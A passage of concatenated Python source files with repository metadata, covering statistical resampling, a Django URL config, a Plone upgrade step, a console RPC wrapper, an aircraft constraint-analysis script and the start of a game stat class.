None to skip seeding (default 0).
Returns
-------
Iterator over index.
"""
n = int(n)
samples = int(samples)
if samples < 0:
err = "Complete permutation for resampling through reordering"
raise NotImplementedError(err)
if _YIELD_ORIGINAL:
original = np.arange(n)
for _ in xrange(samples):
yield original
return
if seed is not None:
np.random.seed(seed)
if unit is None:
if replacement:
for _ in xrange(samples):
yield np.random.randint(n, size=n)
else:
index = np.arange(n)
for _ in xrange(samples):
np.random.shuffle(index)
yield index
else:
if replacement:
raise NotImplementedError("Replacement and units")
else:
idx_orig = np.arange(n)
idx_perm = np.arange(n)
unit_idxs = [np.nonzero(unit == cell)[0] for cell in unit.cells]
for _ in xrange(samples):
for idx_ in unit_idxs:
v = idx_orig[idx_]
np.random.shuffle(v)
idx_perm[idx_] = v
yield idx_perm
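# Usage sketch (added for illustration; `y` is a hypothetical NumPy array
# holding one value per case):
#   y = np.arange(10)
#   for index in permute_order(10, samples=3):
#       shuffled = y[index]  # one random reordering per sample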
def permute_sign_flip(n, samples=10000, seed=0, out=None):
"""Iterate over indices for ``samples`` permutations of the data
Parameters
----------
n : int
Number of cases.
samples : int
Number of samples to yield. If < 0, all possible permutations are
performed.
seed : None | int
Seed the random state of the :mod:`random` module to make replication
possible. None to skip seeding (default 0).
out : array of int8 (n,)
Buffer for the ``sign`` variable that is yielded in each iteration.
Yields
------
sign : array of int8 (n,)
Sign for each case (``1`` or ``-1``; ``sign`` is the same array object
but its content modified in every iteration).
"""
n = int(n)
if seed is not None:
random.seed(seed)
if out is None:
out = np.empty(n, np.int8)
else:
assert out.shape == (n,)
if n > 62: # Python 2 limit for xrange
if samples < 0:
raise NotImplementedError("All possibilities for more than 62 cases")
n_groups = ceil(n / 62.)
group_size = int(ceil(n / n_groups))
for _ in izip(*(permute_sign_flip(stop - start, samples, None,
out[start: stop]) for
start, stop in intervals(range(0, n, group_size) + [n]))):
yield out
return
# determine possible number of permutations
n_perm_possible = 2 ** n
if samples < 0:
# do all permutations
sample_sequences = xrange(1, n_perm_possible)
else:
# random resampling
sample_sequences = random.sample(xrange(1, n_perm_possible), samples)
for seq in sample_sequences:
out.fill(1)
for i in (i for i, s in enumerate(bin(seq)[-1:1:-1]) if s == '1'):
out[i] = -1
yield out
def resample(Y, samples=10000, replacement=False, unit=None, seed=0):
"""
Generator function to resample a dependent variable (Y) multiple times
Parameters
----------
Y : Var | NDVar
Variable which is to be resampled.
samples : int
Number of samples to yield. If < 0, all possible permutations are
performed.
replacement : bool
whether random samples should be drawn with replacement or without.
unit : categorial
Factor specifying unit of measurement (e.g. subject). If unit is
specified, resampling proceeds by first resampling the categories of
unit (with or without replacement) and then shuffling the values
within units (no replacement).
seed : None | int
Seed the random state of the relevant randomization module
(:mod:`random` or :mod:`numpy.random`) to make replication possible.
None to skip seeding (default 0).
Returns
-------
Iterator over Y_resampled. One copy of ``Y`` is made, and this copy is
yielded in each iteration with shuffled data.
"""
if isinstance(Y, Var):
pass
elif isinstance(Y, NDVar):
if not Y.has_case:
raise ValueError("Need NDVar with cases")
else:
raise TypeError("Need Var or NDVar")
out = Y.copy('{name}_resampled')
for index in permute_order(len(out), samples, replacement, unit, seed):
out.x[index] = Y.x
yield out
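# Usage sketch (added for illustration; assumes `y` is a Var or NDVar):
#   for y_perm in resample(y, samples=1000):
#       ...  # compute the test statistic on y_perm here
# Because the same copy is yielded in every iteration (see docstring above),
# consume each y_perm before advancing rather than storing references to it.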
| [
"[email protected]"
] | |
01ebc7eb291e960ec42d8dc23255d61ec4d1af5c | 71a28d4bc1c0f32dc9185332ba2142ba823d3e53 | /core/urls.py | b9dba265ed605e2da34c2ae8c0cdaf56b88c141d | [] | no_license | ekeydar/train_stops_map | 51b1e3a86967851ea16f2e822867f881b91d24fe | acbc1a1a250ca6c3e7f5dde8932301bd4b67c96d | refs/heads/master | 2016-09-12T21:17:13.771035 | 2016-05-27T12:54:46 | 2016-05-27T12:54:46 | 59,438,833 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^stops/$', views.StopList.as_view(), name='stops'),
url(r'^stops/(?P<pk>\d+)/$', views.StopDetail.as_view(), name='stop'),
]
| [
"[email protected]"
] | |
ec6e6ad22ab5a96295739ceb492638e945ef5cdd | 2734b77a68f6d7e22e8b823418ad1c59fe1a34af | /opengever/dossier/upgrades/to4303.py | 0a0901f85458945e5a68304d5dff1c762b0b9236 | [] | no_license | 4teamwork/opengever.core | 5963660f5f131bc12fd0a5898f1d7c8f24a5e2b1 | a01bec6c00d203c21a1b0449f8d489d0033c02b7 | refs/heads/master | 2023-08-30T23:11:27.914905 | 2023-08-25T14:27:15 | 2023-08-25T14:27:15 | 9,788,097 | 19 | 8 | null | 2023-09-14T13:28:56 | 2013-05-01T08:28:16 | Python | UTF-8 | Python | false | false | 964 | py | from ftw.upgrade import ProgressLogger
from ftw.upgrade import UpgradeStep
from opengever.dossier.templatedossier import TemplateDossier
from plone import api
from zope.event import notify
from zope.lifecycleevent import ObjectModifiedEvent
class MigrateTemplateDossierClass(UpgradeStep):
def __call__(self):
self.setup_install_profile('profile-opengever.dossier.upgrades:4303')
self.migrate_template_dossiers()
def migrate_template_dossiers(self):
catalog = api.portal.get_tool('portal_catalog')
brains = catalog.unrestrictedSearchResults(
portal_type='opengever.dossier.templatedossier')
with ProgressLogger('Migrating templatedossier class', brains) as step:
for brain in brains:
self.migrate_object(brain.getObject())
step()
def migrate_object(self, obj):
self.migrate_class(obj, TemplateDossier)
notify(ObjectModifiedEvent(obj))
| [
"[email protected]"
] | |
f898bc011b7d9345fbef96b0f970ceb599a3409a | 6f1d57238f3b395b04696a16768bcc507f00630c | /A_Comparing_Strings.py | 283a2e89d3cfcd5b5fe35998a4154d040395da59 | [] | no_license | FazleRabbbiferdaus172/Codeforces_Atcoder_Lightoj_Spoj | 024a4a2a627de02e4698709d6ab86179b8301287 | 6465e693337777e7bd78ef473b4d270ce757a3a2 | refs/heads/master | 2023-07-01T06:32:14.775294 | 2021-07-27T17:07:37 | 2021-07-27T17:07:37 | 271,202,781 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | import sys
s1 = list(input())
s2 = list(input())
d1, d2 = dict(), dict()
miss = 0
if len(s1) != len(s2):
print("NO")
sys.exit(0)
for i in range(97, 97+26):
d1[chr(i)] = 0
d2[chr(i)] = 0
for i in range(len(s1)):
d1[s1[i]] += 1
d2[s2[i]] += 1
if s1[i] != s2[i]:
miss += 1
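# (added note) The answer is YES exactly when both strings have identical
# character counts and differ in exactly two positions, i.e. a single swap
# inside s1 would make the two strings equal.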
if d1 == d2 and miss == 2:
print("YES")
else:
print("NO")
| [
"[email protected]"
] | |
213d25bf84577a6d3302247cb04c2a0af37c66c0 | 1abd2d4fe2f01584bf0aab44d7e98e76f7280f9f | /setup.py | 5f1ae46c490365023591c75ca903926ea2fd28c3 | [] | no_license | yychuang/GenIce | b370c046cb4eec134ab80f7faa36aeb00f52786e | 80b836df7208be3d830bd276924a0a91635eded7 | refs/heads/main | 2023-06-06T18:24:23.242385 | 2021-06-28T08:57:25 | 2021-06-28T08:57:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,652 | py | #!/usr/bin/env python3
from setuptools import setup, find_packages
import os
import codecs
import re
# Copied from wheel package
here = os.path.abspath(os.path.dirname(__file__))
#README = codecs.open(os.path.join(here, 'README.txt'), encoding='utf8').read()
#CHANGES = codecs.open(os.path.join(here, 'CHANGES.txt'), encoding='utf8').read()
with codecs.open(os.path.join(os.path.dirname(__file__), 'genice2', '__init__.py'),
encoding='utf8') as version_file:
metadata = dict(
re.findall(
r"""__([a-z]+)__ = "([^"]+)""",
version_file.read()))
long_desc = "".join(open("README.md").readlines())
with open("requirements.txt") as f:
requires = [x.strip() for x in f.readlines()]
setup(name='GenIce2',
python_requires='>=3.6',
version=metadata['version'],
description='A Swiss army knife to generate hydrogen-disordered ice structures.',
long_description=long_desc,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
],
author='Masakazu Matsumoto',
author_email='[email protected]',
url='https://github.com/vitroid/GenIce/',
keywords=['genice2', ],
license='MIT',
packages=find_packages(),
install_requires=requires,
entry_points={
'console_scripts': [
'genice2 = genice2.cli.genice:main',
'analice2 = genice2.cli.analice:main'
]
}
)
| [
"[email protected]"
] | |
83e984bf7313b99dd2e24c39e24640b35d45e344 | a2706c66c4f2769c00fc5f67e1a85742cfa7e17c | /WebSocket/Handle/console.py | 71d912effb8fa4a6b590eaf8e05ac2ba4968e4fc | [
"BSD-3-Clause"
] | permissive | Jeromeyoung/viperpython | 48800312dcbdde17462d28d45865fbe71febfb11 | ba794ee74079285be32191e898daa3e56305c8be | refs/heads/main | 2023-09-01T18:59:23.464817 | 2021-09-26T04:05:36 | 2021-09-26T04:05:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,131 | py | # -*- coding: utf-8 -*-
# @File : console.py
# @Date : 2021/2/26
# @Desc :
from Lib.configs import RPC_FRAMEWORK_API_REQ
from Lib.log import logger
from Lib.method import Method
from Lib.rpcclient import RpcClient
from Lib.xcache import Xcache
class Console(object):
def __init__(self):
pass
@staticmethod
def get_active_console():
result = RpcClient.call(Method.ConsoleList, [], timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
return False
else:
consoles = result.get("consoles")
if len(consoles) == 0:
consoles_create_opt = {"SkipDatabaseInit": True, 'AllowCommandPassthru': False}
result = RpcClient.call(Method.ConsoleCreate, [consoles_create_opt], timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
return False
else:
active_id = int(result.get("id"))
Xcache.set_console_id(active_id)
return True
else:
active_id = int(consoles[0].get("id"))
Xcache.set_console_id(active_id)
return True
@staticmethod
def reset_active_console():
result = RpcClient.call(Method.ConsoleList, [], timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
else:
consoles = result.get("consoles")
if len(consoles) == 0:
pass
else:
for console in consoles: # delete the known consoles
cid = int(console.get("id"))
params = [cid]
RpcClient.call(Method.ConsoleDestroy, params, timeout=RPC_FRAMEWORK_API_REQ)
result = RpcClient.call(Method.ConsoleCreate, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
Xcache.set_console_id(None)
else:
active_id = int(result.get("id"))
Xcache.set_console_id(active_id)
@staticmethod
def write(data=None):
cid = Xcache.get_console_id()
if cid is None:
get_active_console_result = Console.get_active_console()
if get_active_console_result:
cid = Xcache.get_console_id()
else:
return False, None
params = [cid, data.replace("\r\n", "\n")]
result = RpcClient.call(Method.ConsoleWrite, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None or result.get("result") == "failure":
get_active_console_result = Console.get_active_console()
if get_active_console_result:
cid = Xcache.get_console_id()
params = [cid, data.replace("\r\n", "\n")]
result = RpcClient.call(Method.ConsoleWrite, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None or result.get("result") == "failure":
return False, None
else:
return True, result
else:
return False, result
else:
return True, result
@staticmethod
def read():
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid]
result = RpcClient.call(Method.ConsoleRead, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
return False, {}
elif result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
@staticmethod
def tabs(line=None):
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid, line]
result = RpcClient.call(Method.ConsoleTabs, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None or result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
@staticmethod
def session_detach():
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid]
result = RpcClient.call(Method.ConsoleSessionDetach, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
return False, {}
elif result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
@staticmethod
def session_kill():
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid]
result = RpcClient.call(Method.ConsoleSessionKill, params, timeout=RPC_FRAMEWORK_API_REQ)
if result is None:
return False, {}
elif result.get("result") == "failure":
logger.warning(f"Cid: {cid}错误")
return False, {}
else:
return True, result
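# Usage sketch (added for illustration): every helper above returns a
# (success, result) pair, so callers typically unpack it:
#   ok, _ = Console.write("help\n")
#   if ok:
#       ok, output = Console.read()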
| [
"[email protected]"
] | |
c03381a3eb66d32c05604a2226fbaea846f8e98c | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/dbm.py | ac53fcf86f8ad981eb28108dc15d60478a2542de | [] | no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | # encoding: utf-8
# module dbm
# from /usr/lib64/python2.6/lib-dynload/dbm.so
# by generator 1.136
# no doc
# no imports
# Variables with simple values
library = 'GNU gdbm'
# functions
def open(path, flag=None, mode=None): # real signature unknown; restored from __doc__
"""
open(path[, flag[, mode]]) -> mapping
Return a database object.
"""
pass
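# Usage sketch (added; the path is hypothetical and the flag values follow
# the usual dbm convention, e.g. 'c' creates the database if missing):
#   db = open('/tmp/example_db', 'c')
#   db['key'] = 'value'
#   db.close()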
# classes
class error(Exception):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
| [
"[email protected]"
] | |
9726a9fbf16f8881db41c4e2da04c76e619bcd5f | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPD_20210712183638.py | 3a1a9c53b9d9a89641bbb3d4af878f7d702672f8 | [] | no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,856 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
from scipy.optimize import curve_fit
"""
The units used are SI standard.
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
:param n: number of motor
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
self.n = number_of_motor
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
p_w = self.coefficient * (self.q / (self.beta * self.w_s) * cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
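    # For reference, the master equation above encodes the power-based
    # constraint exactly as coded:
    #   P_SL/W_TO = (1 - Hp) * beta * V / alpha
    #               * [ q * C_D / (beta * W/S) + (1/V)*dh/dt + (1/g0)*dV/dt ]
    # where C_D = K1*CL**2 + K2*CL + CD0 + CDR + dCD0 and CL is scaled by the
    # load factor n, plus the distributed-propulsion lift increment dCL.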
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.beta = beta
self.hp = Hp
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k * (load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
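# Usage sketch (added; the argument values mirror the __main__ demo below):
#   problem = ConstrainsAnalysis_Gudmundsson_Method_with_DP(0, 68, 0.988, 3000)
#   p_w_to = problem.take_off()      # required power-to-weight for takeoff
#   w_s_max = problem.stall_speed()  # wing-loading limit from stall speeds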
if __name__ == "__main__":
n = 100
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.78], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
label = ['feasible region with PD', 'feasible region with PD', 'feasible region Gudmundsson',
'feasible region without PD', 'feasible region without PD', 'feasible region Mattingly']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
for k in range(3):
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
if k == 0:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Gudmundsson-Method}$ - Normalized to Sea Level')
elif k == 1:
problem1 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Mattingly-Method}$ - Normalized to Sea Level')
else:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{with}$ $\bf{DP}$ - Normalized to Sea Level')
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 1:
l1a, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
l1b, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
if k != 2:
l1 = plt.legend([l1a, l1b], ['with DP', 'without DP'], loc="upper right")
else:
l1 = plt.legend([l1a, l1b], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
# p_w[1, :] = 200 / (p_w[1, -1] - p_w[1, 20]) * (w_s - p_w[1, 2])
def func(x, a, b, c, d, e):
return a + b*x + c*x**2 + d*x**3 + e*x**4
#return a * np.exp(b * x) + c
if i == 1 or i == 1 + m:
xdata, ydata = p_w[i, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[i, :] = func(w_s, popt[0], popt[1], popt[2], popt[3], popt[4])
#if k != 2:
# p_w[1 + m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2])
#else:
# p_w[1 + m, :] = 200 / (p_w[1 + m, -1] - p_w[1 + m, 20]) * (w_s - p_w[1 + m, 2])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label=label[k])
plt.fill_between(w_s, np.amax(p_w[m:2 * m, :], axis=0), 200, color='r', alpha=0.25,
label=label[k + 3])
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"[email protected]"
] | |
f2d88ede145a55a634404601a3248fdd20b69f0c | 45de3aa97525713e3a452c18dcabe61ac9cf0877 | /src/primaires/perso/stat.py | 376ea04b6dc9b0fedb3545626465b19dc441e1d2 | [
"BSD-3-Clause"
] | permissive | stormi/tsunami | 95a6da188eadea3620c70f7028f32806ee2ec0d1 | bdc853229834b52b2ee8ed54a3161a1a3133d926 | refs/heads/master | 2020-12-26T04:27:13.578652 | 2015-11-17T21:32:38 | 2015-11-17T21:32:38 | 25,606,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,954 | py | # -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Ce fichier contient la classe Stat, détaillée plus bas."""
from abstraits.obase import BaseObj
from primaires.perso.exceptions.stat import *
# Flags:
NX = 0 # no exception will be raised
I0 = 1 # raise an exception if strictly below 0
IE0 = 2 # raise an exception if below or equal to 0
SM = 4 # raise an exception if strictly above MAX
SEM = 8 # raise an exception if above or equal to MAX
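# Note (added): these flags are bit masks, so they can be combined with
# bitwise OR, e.g. flags=I0 | SM raises StatI0 below 0 and StatSM above MAX
# (Stat.set below tests them with expressions such as `flags & I0`).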
class Stat(BaseObj):
"""Cette classe définit une stat (ou caractéristique).
Les attributs d'une stat sont :
nom -- son nom
symbole -- son symbole (utile pour le prompt)
defaut -- sa valeur par défaut, celle donnée à un joueur à sa création
marge -- la marge maximale
max -- une chaîne de caractère représentant une autre stat
flags -- les flags indiquant quand une exception doit être levée
parent -- le parent hébergeant les stats
"""
_nom = "stat"
_version = 1
def __init__(self, nom, symbole, defaut, marge, max, flags=I0, parent=None):
"""Constructeur d'une stat.
Elle prend les mêmes paramètres que ceux passés dans l'ordre, dans
la configuration.
Voir : ./cfg_stats.py
"""
BaseObj.__init__(self)
self.nom = nom
self.symbole = symbole
self.defaut = defaut
self.marge_min = 0
self.marge_max = marge
self.nom_max = max
self.flags = flags
self.parent = parent
# Values
self.__base = self.defaut
self.__variable = 0
self.__max = None
if self.parent and max:
